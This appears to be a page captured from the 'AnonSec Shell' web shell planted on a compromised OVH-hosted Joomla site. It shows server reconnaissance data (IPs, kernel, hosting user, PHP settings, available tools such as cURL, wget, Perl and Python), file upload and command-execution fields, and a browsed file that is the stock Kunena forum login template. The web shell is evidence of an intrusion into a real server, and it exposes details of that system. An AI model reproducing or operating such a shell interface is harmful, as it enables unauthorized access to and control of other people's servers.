AnonSec Shell
Server IP : 213.186.33.4  /  Your IP : 216.73.216.193
Web Server : Apache
System : Linux webm006.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : awebpaca ( 35430)
PHP Version : 8.5.0
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/awebpaca/blog/components/com_kunena/template/system/layouts/widget/login/login/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/awebpaca/blog/components/com_kunena/template/system/layouts/widget/login/login/login.php
<?php
/**
 * Kunena Component
 * @package     Kunena.Template.Crypsis
 * @subpackage  Layout.Widget
 *
 * @copyright   (C) 2008 - 2018 Kunena Team. All rights reserved.
 * @license     https://www.gnu.org/copyleft/gpl.html GNU/GPL
 * @link        https://www.kunena.org
 **/
defined('_JEXEC') or die;
?>
<div class="kloginform center">
	<h1><?php echo JText::_('COM_KUNENA_LOGIN_FORUM');?></h1>
	<form action="<?php echo JRoute::_('index.php?option=com_kunena'); ?>" method="post" class="form-inline">
		<input type="hidden" name="view" value="user" />
		<input type="hidden" name="task" value="login" />
		<?php echo JHtml::_('form.token'); ?>

		<div id="form-login-username" class="control-group center">
			<div class="controls">
				<div class="input-prepend input-append">
					<span class="add-on">
						<?php echo KunenaIcons::user();?>
						<label for="login-username" class="element-invisible">
							<?php echo JText::_('JGLOBAL_USERNAME'); ?>
						</label>
					</span>
					<input id="login-username" type="text" name="username" class="input-small" tabindex="1"
					       size="18" placeholder="<?php echo JText::_('JGLOBAL_USERNAME'); ?>" />
				</div>
			</div>
		</div>

		<div id="form-login-password" class="control-group center">
			<div class="controls">
				<div class="input-prepend input-append">
					<span class="add-on">
						<?php echo KunenaIcons::lock();?>
						<label for="login-passwd" class="element-invisible">
							<?php echo JText::_('JGLOBAL_PASSWORD'); ?>
						</label>
					</span>
					<input id="login-passwd" type="password" name="password" class="input-small" tabindex="2"
					       size="18" placeholder="<?php echo JText::_('JGLOBAL_PASSWORD'); ?>" />
				</div>
			</div>
		</div>

		<?php $login = KunenaLogin::getInstance(); ?>
		<?php if ($login->getTwoFactorMethods() > 1) : ?>
		<div id="form-login-tfa" class="control-group center">
			<div class="controls">
				<div class="input-prepend input-append">
					<span class="add-on">
						<?php echo KunenaIcons::star();?>
						<label for="k-lgn-secretkey" class="element-invisible">
							<?php echo JText::_('COM_KUNENA_LOGIN_SECRETKEY'); ?>
						</label>
				  </span>
					<input id="k-lgn-secretkey" type="text" name="secretkey" class="input-small" tabindex="3"
								size="18" placeholder="<?php echo JText::_('COM_KUNENA_LOGIN_SECRETKEY'); ?>" />
				</div>
			</div>
		</div>
		<?php endif; ?>

		<div id="form-login-submit" class="control-group center">
			<p>
				<button type="submit" tabindex="3" name="submit" class="btn btn-primary btn">
					<?php echo JText::_('JLOGIN'); ?>
				</button>
			</p>

			<p>
				<?php if ($login->getResetUrl()) : ?>
					<a href="<?php echo $login->getResetUrl(); ?>" rel="nofollow">
						<?php echo JText::_('COM_KUNENA_PROFILEBOX_FORGOT_PASSWORD'); ?>
					</a>
					<br />
				<?php endif ?>

				<?php if ($login->getRemindUrl()) : ?>
					<a href="<?php echo $login->getRemindUrl(); ?>" rel="nofollow">
						<?php echo JText::_('COM_KUNENA_PROFILEBOX_FORGOT_USERNAME'); ?>
					</a>
					<br />
				<?php endif ?>

				<?php if ($login->getRegistrationUrl()) : ?>
					<a href="<?php echo $login->getRegistrationUrl(); ?>" rel="nofollow">
						<?php echo JText::_('COM_KUNENA_PROFILEBOX_CREATE_ACCOUNT'); ?>
					</a>
				<?php endif ?>

			</p>
		</div>
	</form>
</div>

Anon7 - 2022
AnonSec Team